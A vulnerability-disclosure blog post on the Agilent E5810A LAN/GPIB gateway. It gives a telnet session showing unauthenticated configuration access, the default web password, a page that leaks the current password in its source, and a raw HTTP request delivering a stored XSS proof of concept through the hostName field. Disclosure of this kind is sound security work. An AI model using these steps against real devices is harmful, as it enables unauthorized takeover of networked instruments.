Agilent E5810A LAN/GPIB Gateway – Multiple Vulnerabilities

The E5810A LAN/GPIB Gateway from Agilent has several vulnerabilities.

#1 Unauthenticated Telnet Access

According to the manual you can telnet to the device for backward compatibility to configure:

For backward compatibility with the E2050 LAN/GPIB Gateway, the Telnet Utility functionality is provided with the E5810. However, E5810 Web Access is the preferred method to configure the E5810.

Testing this:

df ~$ telnet 1.2.3.4
Trying 1.2.3.4…
Connected to 1.2.3.4.
Escape character is ‘^]’.
Welcome to the E5810 LAN/GPIB Gateway Configuration Utility.
Controls GPIB and RS-232 interfaces via the LAN

Commands
? View Available Commands
exit, quit Exit WITHOUT Saving Configuration Changes (see reboot)
reboot Save Configuration Changes and Restart E5810
status View the LAN/GPIB Gateway Connection Status

Read-only E5810 Parameters
hardware-addr: 0030D30969B9 # Ethernet (MAC) Address
serial-num: MY43003219 # Serial Number

Configurable Parameters saved in E5810 non-volatile memory
(Note: Some E5810 current values “in-use” may be different)
dhcp: OFF # Configure LAN for DHCP boot
ip: 1.2.3.4 # Internet Protocol (IP) Address
subnet-mask: 255.255.255.0 # Network Subnet Mask
gateway: 1.2.3.1 # Network Gateway

dns-server: 4.3.2.1 # DNS Server
hostname:
# Internet Hostname

description: Agilent E5810 (00-30-D3-09-69-B9)
# Device Description (UPnP Friendly Name)
upnp: ON # Configured as UPnP device

lan-timeout: 7200 # LAN Timeout (Keepalive) in sec
io-timeout: 120 # I/O Timeout in seconds

gpib-name: gpib0 # GPIB SICL Interface Name
gpib-address: 21 # GPIB System Controller Address
gpib-unit: 7 # GPIB Logical Unit (LU) Number

rs232-name: COM1 # RS-232 SICL Interface Name
rs232-baud: 9600 # RS-232 Baud Rate
rs232-bits: 8 # RS-232 Bits
rs232-stopbits: 1 # RS-232 Stop Bits
rs232-parity: NONE # RS-232 Parity
rs232-flow: NONE # RS-232 Flow Control
rs232-srq: RI # RS-232 SRQ

> ?
Available commands are:
help View Help Information
? View Available Commands
config View Configured Settings
serial-num View the Device Serial Number
version View the Firmware Revision
hardware-addr View the Ethernet (MAC) Address
dhcp Turn OFF or ON the use of DHCP
ip View/Set the IP Address
subnet-mask View/Set the Network Subnet Mask
gateway View/Set the Gateway Address
dns-server View/Set the DNS Server Address
hostname View/Set the Internet Hostname
description View/Set Device Description (UPnP Friendly Name)
upnp Turn OFF or ON the use of UPnP
lan-timeout View/Set the LAN Timeout (Keepalive). 0 is Off.
io-timeout View/Set the Server I/O Timeout. 0 is Off.
gpib-name View/Set the GPIB SICL Interface Name
gpib-address View/Set the GPIB System Controller Address
gpib-unit View/Set the GPIB Logical Unit Number
rs232-name View/Set the RS-232 SICL Interface Name
rs232-baud View/Set Baud
rs232-bits View/Set number of RS-232 data Bits
rs232-stopbits View/Set number of RS-232 Stop Bits
rs232-parity View/Set the RS-232 Parity
rs232-flow View/Set the RS-232 Flow Control
rs232-srq View/Set the RS-232 SRQ Line
status View the LAN/GPIB Gateway Connection Status
syslog-display View Contents of the Syslog
syslog-clear Clear the Syslog
password Enter the Password (when prompted)
(Password is required when making changes)
changepassword Change the Password (when prompted)
reboot Save Configuration and Reboot E5810
factory-reset Reset Config to Factory Defaults and Reboot
exit Exit WITHOUT Saving Configuration (see reboot)
quit Exit WITHOUT Saving Configuration (see reboot)
bye Exit WITHOUT Saving Configuration (see reboot)

> quit

E5810 Non-UPnP parameters are UNCHANGED.
Telnet session will end.

Connection closed by foreign host.

#2 Default Password for Web Interface

From the manual:

The E5810 uses these default configuration values until you set any other configuration values.
Password E5810

#3 password.html Cleartext Password Disclosure

Regardless of what the password is the password.html page will send you the current one. It only uses JavaScript to obscure it so looking at the source reveals it:

http://1.2.3.4/html/password.html

agilent01

agilent02

#4 config_lan.html hostName Parameter Stored XSS (CVE-2013-78007)

Go to the configuration and change the hostname. It has local JavaScript to block special characters but use a proxy and send a regular XSS string:

POST /html/config_lan.html HTTP/1.1
User-Agent: Opera/9.80 (Windows NT 6.1; WOW64) Presto/2.12.388 Version/12.15
Host: 1.2.3.4
Accept: text/html, application/xml;q=0.9, application/xhtml+xml, image/png, image/webp, image/jpeg, image/gif, image/x-xbitmap, */*;q=0.1
Accept-Language: en-US,en;q=0.9
Accept-Encoding: gzip, deflate
Referer: http://1.2.3.4/html/config_lan.html
Proxy-Connection: Keep-Alive
Content-Length: 451
Content-Type: application/x-www-form-urlencoded

Save=+Save+&dhcpSetting=0&ipAddress=1.2.3.4&subnetMask=255.255.255.0&subnetAddress=1.2.3.4&DNSserver=4.3.2.1&hostName=alert(‘df’)&description=Agilent+E5810+%2800-30-D3-09-69-B9%29&UPnPSetting=1&lanTO=7200&ioTO=120&gpibName=gpib0&gpibAddr=21&gpibLU=7&rs232Name=COM1&BaudSetting=9600&ParitySetting=NONE&BitsSetting=8&StopBitsSetting=1&FlowSetting=NONE&SrqSetting=RI&passOld=&curPassOld=E5810&pass1=&pass2=&ContinueOn=True

aglient03-xss

Advertisements

Tags: , , ,

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s


%d bloggers like this: